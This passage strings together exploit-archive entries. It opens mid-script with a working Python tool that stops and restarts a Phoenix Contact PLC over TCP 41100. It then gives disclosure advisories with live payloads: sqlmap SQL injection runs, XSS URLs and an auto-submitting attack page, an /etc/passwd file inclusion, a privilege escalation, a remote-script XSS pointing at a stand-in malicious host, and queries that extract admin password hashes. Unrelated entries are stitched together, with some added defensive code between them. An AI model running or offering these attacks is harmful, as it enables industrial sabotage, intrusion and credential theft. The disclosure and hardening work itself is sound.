    send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500')
    send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500')
    send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200')
    send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500')
    send_and_recv(s,1000,'0100000000002500000000000000d9ff4164652e52656d6f74696e672e53657276696365732e49466f726365536572766963653200')
    send_and_recv(s,1000,'010000000000240000000000000000004164652e52656d6f74696e672e53657276696365732e49466f7263655365727669636500')
    send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300')
    send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200')
    send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200')
    send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500')
    send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653300')
    send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500')
    send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653200')
    send_and_recv(s,1000,'0100000000002900000000000000d5ff4164652e52656d6f74696e672e53657276696365732e49427265616b706f696e745365727669636500')
    send_and_recv(s,1000,'0100000000002800000000000000d6ff4164652e52656d6f74696e672e53657276696365732e4943616c6c737461636b5365727669636500')
    send_and_recv(s,1000,'010000000000250000000000000000004164652e52656d6f74696e672e53657276696365732e494465627567536572766963653200')
    send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200')
    send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500')
    send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300')
    send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200')
    send_and_recv(s,1000,'0100020000000e0003000300000000000500000012401340130011401200')
    return

def is_ipv4(ip):
    # Each octet needs at least one digit, otherwise int('') below would fail
    match = re.match("^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$", ip)
    if not match:
        return False
    quad = []
    for number in match.groups():
        quad.append(int(number))
    if quad[0] < 1:
        return False
    for number in quad:
        if number > 255 or number < 0:
            return False
    return True

##### The Actual Program
if not len(sys.argv) == 2:
    IP = raw_input("Please enter the IPv4 address of the Phoenix PLC: ")
else:
    IP = sys.argv[1]
if not is_ipv4(IP):
    print "Please go read RFC 791 and then use a legitimate IPv4 address."
    sys.exit()

## - initialization, this will get the PLC type, Firmware version, build date & time
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,infoport))
print 'Initializing PLC'
print '----------------'
code = send_and_recv(s,1000,'0101001a005e000000000003000c494245544830314e305f4d00').encode('hex')[34:36]
send_and_recv(s,1000,'01050016005f000008ef00' + code + '00000022000402950000')
ret = send_and_recv(s,1000,'0106000e00610000881100' + code + '0400')
print 'PLC Type = ' + ret[30:50]
print 'Firmware = ' + ret[66:70]
print 'Build = ' + ret[79:100]
send_and_recv(s,1000,'0105002e00630000000000' + code + '00000023001c02b0000c0000055b4433325d0b466c617368436865636b3101310000')
send_and_recv(s,1000,'0106000e0065ffffff0f00' + code + '0400')
send_and_recv(s,1000,'010500160067000008ef00' + code + '00000024000402950000')
send_and_recv(s,1000,'0106000e0069ffffff0f00' + code + '0400')
send_and_recv(s,1000,'0102000c006bffffff0f00' + code)
s.shutdown(socket.SHUT_RDWR)
s.close()
print 'Initialization done'
print '-------------------\r\n'
print 'Will now print the PLC state and reverse it after 3 seconds'
raw_input('Press [Enter] to continue')

########## CONTROL PHASE ####### Start monitoring with loop on port 41100
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,controlport))
# First init phase (sending things like 'Ade.Remoting.Services.IProConOSControlService2' and 'Ade.Remoting.Services.ISimpleFileAccessService3', 21 packets)
initMonitor(s)
# Query packet
packet1 = '010002000000080003000300000000000200000002400b40'
# Keepalive packet
packet2 = '0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600'
## The keepalive and query-status loop (2 x keepalive, one query per iteration):
i = 0
state = 'On'
running = 0
stopme = 0
startme = 0
while True:
    i += 1
    time.sleep(0.1)
    ## Keep Alive
    send_and_recv(s,1000,packet2)
    send_and_recv(s,1000,packet2)
    ## Possible actions (like stop/start) should be sent now before the query state
    if (state == 'Running' and stopme):
        print 'Sending Stop'
        doAction(s,'01000200000000000100070000000000')
        startme = stopme = 0
    elif (state == 'Stop' and startme):
        print 'Sending COLD Start'
        ## This is the COLD start: doAction(s,'010002000000020001000600000000000100')
        ## This is the WARM start: doAction(s,'010002000000020001000600000000000200')
        ## This is the HOT start: doAction(s,'010002000000020001000600000000000300')
        doAction(s,'010002000000020001000600000000000100')
        startme = stopme = 0
    ## Query Status
    ret = send_and_recv(s,1000,packet1).encode('hex')
    if ret[48:50] == '03':
        state = 'Running'
    elif ret[48:50] == '07':
        state = 'Stop'
    elif ret[48:50] == '00':
        state = 'On'
    else:
        # ret is already hex-encoded, so slice it directly
        print 'State unknown, found code: '+ret[48:50]
    print 'Current PLC state: '+state
    ## Maintaining the LOOP
    if i == 50:
        break
    # '''
    if i == 30:
        if state == 'Running':
            stopme = 1
        else:
            startme = 1
    #'''
raw_input('All done, press [Enter] to exit')
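The script above shows that the ILC control channel accepts stop and start commands from anyone who can reach TCP 41100, so the compensating control is network-level: only engineering stations may talk to ports 1962 and 41100, and any control command should be logged even from them. The following monitor is an added example (not part of the script or the vendor's software): it labels PLC-bound payloads using the exact command bytes documented in the script, decodes the state byte of a status reply the same way the script does, and raises alerts over a set of constructed flow records. The record format, the allow-list and the addresses are assumptions for the demonstration.

```python
INFO_PORT = 1962       # device-info channel used by the script above
CONTROL_PORT = 41100   # start/stop control channel used by the script above

# Exact payloads the script sends on port 41100, mapped to what they do.
KNOWN_PAYLOADS = {
    "01000200000000000100070000000000": "stop",
    "010002000000020001000600000000000100": "cold start",
    "010002000000020001000600000000000200": "warm start",
    "010002000000020001000600000000000300": "hot start",
    "010002000000080003000300000000000200000002400b40": "status query",
    "0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600": "keepalive",
}
CONTROL_ACTIONS = {"stop", "cold start", "warm start", "hot start"}

# The script reads the PLC state from hex offset 48:50 of the status reply,
# i.e. byte 24 of the raw response.
STATE_CODES = {0x03: "Running", 0x07: "Stop", 0x00: "On"}


def decode_state(reply):
    """Map a raw status reply (bytes) to the PLC state name, or 'Unknown'."""
    if len(reply) < 25:
        return "Unknown"
    return STATE_CODES.get(reply[24], "Unknown")


def classify_payload(dport, payload_hex):
    """Label a payload sent to the PLC; None when it is not PLC traffic."""
    if dport == INFO_PORT:
        return "device-info"
    if dport == CONTROL_PORT:
        return KNOWN_PAYLOADS.get(payload_hex.lower(), "other")
    return None


def review_flows(records, allowed_sources):
    """Return alerts for PLC traffic from hosts outside the allow-list and
    notices for every control action, even from an allowed station.

    Each record is a dict with src, dport and payload_hex; in a real deployment
    these come from a tap or a Zeek/NetFlow export that keeps payload bytes.
    """
    alerts = []
    for rec in records:
        label = classify_payload(rec["dport"], rec["payload_hex"])
        if label is None:
            continue                      # not PLC traffic
        if rec["src"] not in allowed_sources:
            alerts.append(("ALERT", rec["src"], rec["dport"], label))
        elif label in CONTROL_ACTIONS:
            alerts.append(("NOTICE", rec["src"], rec["dport"], label))
    return alerts


# Constructed sample: 10.0.5.10 is the only allowed engineering station.
ALLOWED = {"10.0.5.10"}
SAMPLE_RECORDS = [
    {"src": "10.0.5.10", "dport": 41100,
     "payload_hex": "0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600"},
    {"src": "10.0.5.10", "dport": 41100, "payload_hex": "010002000000020001000600000000000100"},
    {"src": "10.0.9.77", "dport": 1962,
     "payload_hex": "0101001a005e000000000003000c494245544830314e305f4d00"},
    {"src": "10.0.9.77", "dport": 41100, "payload_hex": "01000200000000000100070000000000"},
    {"src": "10.0.9.77", "dport": 80, "payload_hex": "474554202f20485454502f312e31"},
]

if __name__ == "__main__":
    for alert in review_flows(SAMPLE_RECORDS, ALLOWED):
        print(alert)
```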
# Exploit Title: SQLi in FeedWordPress WordPress plugin
# Date: 2015-05-19
# Exploit Author: Adrián M. F.
# Vendor Homepage: https://wordpress.org/plugins/feedwordpress/
# Vulnerable version: 2015.0426
# Fixed version: 2015.0514
# CVE : CVE-2015-4018
(1) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
feedwordpresssyndicationpage.class.php:89
+++++++++++++++++++++++++++++++++++++++++
$targets = $wpdb->get_results("
SELECT * FROM $wpdb->links
WHERE link_id IN (".implode(",",$_POST['link_ids']).")
");
+++++++++++++++++++++++++++++++++++++++++
http://192.168.167.131/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php
POST DATA: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1[SQLi]
* POC:
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py -u "http://[domain]/wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=Y" --data="_wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1" -p "link_ids[]" --dbms mysql --cookie="[cookie]"
[............]
POST parameter 'link_ids[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: link_ids[] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) AND (SELECT * FROM (SELECT(SLEEP(5)))eHWc) AND (7794=7794
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x70716153577975544373,0x7178716271)--
---
[10:40:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-14: Vendor notification.
2015-05-14: Vendor response and fix.
2015-05-19: Public disclosure.
"""
# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)
# Date: 20-5-2015
# Vendor homepage: www.emtec.com
# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html
# Author: Dolev Farhi
# Details:
# --------
# Create a new connection, run the py script and copy the AAAA... string from zoc.txt to the clipboard. Paste it into the
# server address field and attempt to connect.
"""
#!/usr/bin/python
# Writes the overflow string to zoc.txt; the report states that 97 bytes reach the SEH record.
filename = "zoc.txt"
buffer = "\x41" * 97
textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()
source: https://www.securityfocus.com/bid/52944/info
Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Uploadify Integration 0.9.6 is vulnerable; other prior versions may also be affected.
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>
source: https://www.securityfocus.com/bid/52970/info
Matterdaddy Market is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Matterdaddy Market 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/mdmarket/admin/controller.php?cat_name=1&cat_order=-1%27[SQL INJECTION]&add=Add+Category&op=newCategory
http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory
source: https://www.securityfocus.com/bid/52946/info
CitrusDB is prone to a local file-include vulnerability and an SQL-injection vulnerability.
An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
CitrusDB 2.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base
source: https://www.securityfocus.com/bid/52983/info
BGS CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
BGS CMS 2.2.1 is vulnerable; other versions may also be affected.
<html>
<title>BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities</title>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
function xss6(){document.forms["xss6"].submit();}
function xss7(){document.forms["xss7"].submit();}
</script>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="name" value="Zero Science Lab" />
<input type="hidden" name="title" value="XSS" />
<input type="hidden" name="description" value="Cross Site Scripting" />
<input type="hidden" name="parent_id" value="15" />
<input type="hidden" name="redirect" value='"><script>alert(1);</script>' />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="categories" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="29" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="title" value="Zero Science Lab" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="disp_on_full_view" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="level" value="0" />
<input type="hidden" name="type" value="ads" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="ads" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="0" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="created" value="ZSL" />
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="email" value="test@test.mk" />
<input type="hidden" name="message" value="t00t" />
<input type="hidden" name="status" value="coolio" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="orders" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="question" value="What is physics?" />
<input type="hidden" name="start" value="10 2012" />
<input type="hidden" name="end" value="18 2012" />
<input type="hidden" name="answer_text[]" value="A warm summer evening." />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="polls" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="image" value="joxy.jpg" />
<input type="hidden" name="url" value='"><script>alert(1);</script>' />
<input type="hidden" name="max_displays" value="1" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="banners" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="9" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="description" value="Ban" />
<input type="hidden" name="folder" value="sexy_banner_imgx" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="gallery" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/" method="GET" id="xss6">
<input type="hidden" name="action" value="search" />
<input type="hidden" name="search" value='"><script>alert(1);</script>' />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />
</form>
<form action="http://www.example.com/cms/" method="GET" id="xss7">
<input type="hidden" name="section" value='"><script>alert(1);</script>' />
<input type="hidden" name="action" value="add_news" />
</form>
<br /><br />
<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
<a href="javascript: xss6();" style="text-decoration:none">
<b><font color="red"><h3>XSS 6</h3></font></b></a><br /><br />
<a href="javascript: xss7();" style="text-decoration:none">
<b><font color="red"><h3>XSS 7</h3></font></b></a><br /><br />
</body></html>
source: https://www.securityfocus.com/bid/52986/info
All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected.
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
# Exploit Title: WordPress WP Membership plugin [Multiple Vulnerabilities]
# Date: 2015/05/19
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# Category: webapps
========================================
* 1. Privilege escalation
========================================
1.1 Description
Any registered user can perform a privilege escalation through the
`iv_membership_update_user_settings` AJAX action.
Although the same flaw can be used to modify other plugin-related data
(e.g. payment status and expiry date), the privilege escalation is the
serious part: a malicious user can grant themselves the administrator
role on the affected website.
1.2 Proof of Concept
* Login as a regular user
* Send a POST request to `http://example.com/wp-admin/admin-ajax.php`
with data:
`action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`
1.3 Actions taken after discovery
Vendor was informed on 2015/05/19.
1.4 Solution
No official solution yet exists.
========================================
* 2. Stored XSS
========================================
2.1 Description
Input fields submitted by registered users are not properly escaped. This
could lead to a stored XSS attack affecting all visitors of the website,
including administrators.
2.2 Proof of Concept
* Login as a regular user
* Update any field of your profile, appending at the end
`<script>alert('XSS');</script>`
or
`<script src="http://malicious.server/my_malicious_script.js"></script>`
2.3 Actions taken after discovery
Vendor was informed on 2015/05/19.
2.4 Solution
No official solution yet exists.
========================================
* 3. Unauthorized post publish and stored XSS
========================================
3.1 Description
Registered users can publish a post without administrator confirmation.
Normally all posts submitted by users registered through the WP Membership
plugin are stored with the status `pending`. A malicious user can, however,
publish their post by tampering with the form used for submission.
3.2 Proof of Concept
* Login as a regular user who belongs to a group that can submit new posts
* Visit the `New Post` section at your profile
* Change field `post_status`:
<select id="post_status" class="form-control" name="post_status">
<option value="publish" selected="selected">Pending Review</option>
<option value="draft">Draft</option>
</select>
The post gets immediately published after you submit the form and is
visible to all visitors of the website.
In addition a stored XSS attack can be performed due to insufficient
escaping of the post content input.
3.3 Actions taken after discovery
Vendor was informed on 2015/05/19.
3.4 Solution
No official solution yet exists.
3.5 Workaround
Prevent users from submitting new posts through the corresponding option in
the plugin's settings.
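Issues 1 and 3 share one root cause: the server takes the user id, the role and the post status from the request instead of deciding them itself. The PHP below is an added example, not WP Membership's own code, showing the shape both handlers need: identity from the session, a whitelist of member-editable fields so `user_role` and the payment/expiry fields cannot be set by a member, and a post status fixed server-side regardless of what the form's `<select>` sends. The AJAX action names, nonce actions, meta keys and field names are assumptions; every `wp_*`, `check_ajax_referer` and `current_user_can` call is a WordPress core API, so this loads as part of a plugin rather than as a standalone script.

```php
<?php
// Added example, not WP Membership code: hardened handlers for the two
// server-side gaps the advisory describes. Assumed: the action names, the
// nonce actions ('ivm_settings', 'ivm_submit_post'), meta keys and field
// lists. Real: the WordPress core functions used throughout.

add_action('wp_ajax_iv_membership_update_user_settings', 'ivm_update_user_settings_hardened');

function ivm_update_user_settings_hardened(): void
{
    // CSRF: the request must carry a nonce minted for this action.
    check_ajax_referer('ivm_settings', 'nonce');

    // Identity comes from the session. A user_id inside form_data is ignored,
    // so the PoC's user_id%3D<yourUserID> has nothing to act on.
    $user_id = get_current_user_id();
    if ($user_id === 0) {
        wp_send_json_error('not logged in', 401);
    }

    // Parse the serialized form_data the plugin receives.
    $posted = [];
    wp_parse_str(wp_unslash($_POST['form_data'] ?? ''), $posted);

    // Administrative state is refused outright unless the caller may manage
    // users; a member endpoint should not even be the place to change it.
    $admin_only = ['user_role', 'payment_status', 'expiry_date'];   // assumed names
    foreach ($admin_only as $key) {
        if (array_key_exists($key, $posted) && !current_user_can('promote_users')) {
            wp_send_json_error("field {$key} is not member-editable", 403);
        }
    }

    // Only whitelisted keys are written, sanitized on the way in. Anything
    // printed later still goes through esc_html() at the output site.
    $member_editable = ['display_name', 'city', 'bio'];             // assumed names
    $updated = [];
    foreach ($member_editable as $key) {
        if (isset($posted[$key])) {
            update_user_meta($user_id, 'ivm_' . $key, sanitize_text_field($posted[$key]));
            $updated[] = $key;
        }
    }
    wp_send_json_success(['updated' => $updated]);
}

add_action('wp_ajax_iv_membership_submit_post', 'ivm_submit_post_hardened');

function ivm_submit_post_hardened(): void
{
    check_ajax_referer('ivm_submit_post', 'nonce');
    if (!is_user_logged_in()) {
        wp_send_json_error('not logged in', 401);
    }
    // The form's post_status <select> is ignored: status is derived from the
    // caller's capabilities, and the body passes through wp_kses_post() so a
    // stored <script> never reaches visitors.
    $post_id = wp_insert_post([
        'post_title'   => sanitize_text_field(wp_unslash($_POST['post_title'] ?? '')),
        'post_content' => wp_kses_post(wp_unslash($_POST['post_content'] ?? '')),
        'post_status'  => current_user_can('publish_posts') ? 'publish' : 'pending',
        'post_author'  => get_current_user_id(),
    ], true);
    if (is_wp_error($post_id)) {
        wp_send_json_error($post_id->get_error_message(), 500);
    }
    wp_send_json_success(['post_id' => $post_id]);
}
```

The capability names (`promote_users`, `publish_posts`) are WordPress's own; which one the membership plugin should key on is a policy choice, but the decision must be made from `current_user_can()` on the server, never from a value the client posts.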
source: https://www.securityfocus.com/bid/52986/info (further PoC URLs for the All-in-One Event Calendar 1.4 cross-site scripting issues described above)
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php?button_value=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php?msg=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Forma LMS 1.3 Multiple SQL Injections
[+] Author: Filippo Roncari
[+] Target: Forma LMS
[+] Version: 1.3 and probably lower
[+] Vendor: http://www.formalms.org
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf
[+] Info: f.roncari@securenetwork.it / f@unsec.it
[+] Summary
Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more.
[+] Vulnerability Details
Forma LMS 1.3 is prone to multiple SQL injection vulnerabilities, which allow unprivileged users to inject arbitrary SQL statements.
An attacker could exploit these vulnerabilities by sending crafted requests to the web application. These issues can lead to data theft, data disruption, account compromise and other attacks, depending on the privileges of the DBMS user.
[+] Technical Details
See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for technical details and source code.
[+] Proof of Concept (PoC)
Unprivileged users such as Students or Professors can exploit these issues.
In the payloads below the "idst" SQL parameter is 11836, which was the admin's user ID in the tested installation.
[!] coursereport.php SQL Injection in title param
-------------------------
POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1
Host: localhost
Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885
authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&source_of=scoitem&title=null+union+select+pass+from+core_user+where+idst=11836+&filtra=Salva+modifiche
-------------------------
[!] lib.message.php Blind Time-Based SQL Injection in msg_course_filter param
-------------------------
POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1 Host: localhost
Cookie: docebo_session=0c0491bb1fa6d814752d9e59c066df60
[...]
------WebKitFormBoundaryu0DCt6tLZt8hAdlH
Content-Disposition: form-data; name="msg_course_filter"
99999 union SELECT IF(SUBSTRING(pass,1,1) = char(100),benchmark(5000000,encode(1,2)),null) from core_user
where idst=11836
[...]
------------------------
[!] coursereport.php SQL Injection in id_source param
-------------------------
POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1
Host: localhost
Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885; SQLiteManager_currentLangue=2
authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&weight=123&show_to_user=true&use_for_final=true&title=&source_of=scoitem&titolo=&id_source=null+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,pass,null,null,null+from+core_user+where+idst=11836&save=Salva+modifiche
-------------------------
For further details and explanations check the full advisory.
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
=======================================================================
title: SQL Injection
product: WordPress WP Symposium Plugin
vulnerable version: 15.1 (and probably below)
fixed version: 15.4
CVE number: CVE-2015-3325
